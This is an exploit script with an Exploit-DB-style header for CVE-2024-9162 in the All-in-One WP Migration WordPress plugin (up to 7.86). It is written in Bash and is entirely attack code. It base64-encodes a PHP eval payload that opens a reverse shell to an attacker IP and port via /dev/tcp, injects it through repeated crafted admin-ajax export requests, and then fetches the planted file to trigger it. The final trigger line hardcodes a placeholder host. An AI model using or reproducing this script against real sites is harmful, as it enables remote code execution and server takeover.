README.md
Rendering markdown...
# Exploit Title: All-in-One WP Migration and Backup <= 7.86 - Authenticated (Administrator+) Arbitrary File Upload
# Date: 09/29/2024
# Exploit Author: Ryan Kozak https://ryankozak.com
# Vendor Homepage: https://servmask.com/
# Version: <= 7.86
# Tested on: 7.86
# CVE : CVE-2024-9162
#!/bin/bash
# Show example usage of this exploit script.
show_usage () {
echo "Example Usage: "
echo " ./CVE-2024-9162.sh https://wordpress.hacker PwrqqK3UHQJo 192.168.100.86 4444"
}
XFILE_NAME=CVE-2024-9162.php # Change if you'd like.
XDIRECTORY_NAME=CVE-2024-9162 # Change if you'd like.
# Validate required arguments for victim url, secret key, attacker ip and lisening port.
if [ "$#" -eq 4 ]; then
VICTIM_URL=$1
SECRET_KEY=$2
ATTACKER_IP=$3
ATTACKER_PORT=$4
else
show_usage
exit 1
fi
# Exploit Payload
PAYLOAD="shell_exec('bash -c \"/bin/bash -i >& /dev/tcp/$3/$4 0>&1 \" 2>/dev/null');"
PAYLOAD=$(echo -n $PAYLOAD | base64)
PAYLOAD="<?php eval(base64_decode('$PAYLOAD')); ?>"
# URL encode the payload before it's sent.
PAYLOAD=$(echo $PAYLOAD | jq --slurp --raw-input --raw-output @uri)
PRIORITY_INT=30
curl --silent --output /dev/null --path-as-is -i -s -k -X $'POST' \
--data-binary $"\x0d\x0a\x0d\x0a\x0d\x0aaction=ai1wm_export&ai1wm_import=1&options%5Breplace%5D%5Bold_value%5D%5B%5D=&options%5Breplace%5D%5Bold_value%5D%5B%5D=*&options%5Breplace%5D%5Bnew_value%5D%5B%5D=&options%5Breplace%5D%5Bnew_value%5D%5B%5D=$PAYLOAD&options%5Bencrypt_password%5D=&options%5Bencrypt_password_confirmation%5D=&options%5Bno_spam_comments%5D=on&options%5Bno_post_revisions%5D=on&options%5Bno_media%5D=on&options%5Bno_themes%5D=on&options%5Bno_muplugins%5D=on&options%5Bno_plugins%5D=on&options%5Bno_database%5D=on&options%5Bno_email_replace%5D=on&ai1wm_manual_export=1&storage=$XDIRECTORY_NAME&file=1&secret_key=$SECRET_KEY&priority=$PRIORITY_INT&archive=$XFILE_NAME" \
$"$VICTIM_URL/wp-admin/admin-ajax.php?action=ai1wm_export&ai1wm_import=1"
PRIORITY_INT=50
curl --silent --output /dev/null --path-as-is -i -s -k -X $'POST' \
--data-binary $"\x0d\x0a\x0d\x0a\x0d\x0aaction=ai1wm_export&ai1wm_import=1&options%5Breplace%5D%5Bold_value%5D%5B%5D=&options%5Breplace%5D%5Bold_value%5D%5B%5D=*&options%5Breplace%5D%5Bnew_value%5D%5B%5D=&options%5Breplace%5D%5Bnew_value%5D%5B%5D=$PAYLOAD&options%5Bencrypt_password%5D=&options%5Bencrypt_password_confirmation%5D=&options%5Bno_spam_comments%5D=on&options%5Bno_post_revisions%5D=on&options%5Bno_media%5D=on&options%5Bno_themes%5D=on&options%5Bno_muplugins%5D=on&options%5Bno_plugins%5D=on&options%5Bno_database%5D=on&options%5Bno_email_replace%5D=on&ai1wm_manual_export=1&storage=$XDIRECTORY_NAME&file=1&secret_key=$SECRET_KEY&priority=$PRIORITY_INT&archive=$XFILE_NAME" \
$"$VICTIM_URL/wp-admin/admin-ajax.php?action=ai1wm_export&ai1wm_import=1"
PRIORITY_INT=60
curl --silent --output /dev/null --path-as-is -i -s -k -X $'POST' \
--data-binary $"\x0d\x0a\x0d\x0a\x0d\x0aaction=ai1wm_export&ai1wm_import=1&options%5Breplace%5D%5Bold_value%5D%5B%5D=&options%5Breplace%5D%5Bold_value%5D%5B%5D=*&options%5Breplace%5D%5Bnew_value%5D%5B%5D=&options%5Breplace%5D%5Bnew_value%5D%5B%5D=$PAYLOAD&options%5Bencrypt_password%5D=&options%5Bencrypt_password_confirmation%5D=&options%5Bno_spam_comments%5D=on&options%5Bno_post_revisions%5D=on&options%5Bno_media%5D=on&options%5Bno_themes%5D=on&options%5Bno_muplugins%5D=on&options%5Bno_plugins%5D=on&options%5Bno_database%5D=on&options%5Bno_email_replace%5D=on&ai1wm_manual_export=1&storage=$XDIRECTORY_NAME&file=1&secret_key=$SECRET_KEY&priority=$PRIORITY_INT&archive=$XFILE_NAME" \
$"$VICTIM_URL/wp-admin/admin-ajax.php?action=ai1wm_export&ai1wm_import=1"
# TRIGGER THE EXPLOIT CODE,
echo "Triggering exploit, check your listener..."
curl -k --max-time 0 https://wordpress.hacker/wp-content/plugins/all-in-one-wp-migration/storage/$XDIRECTORY_NAME/$XFILE_NAME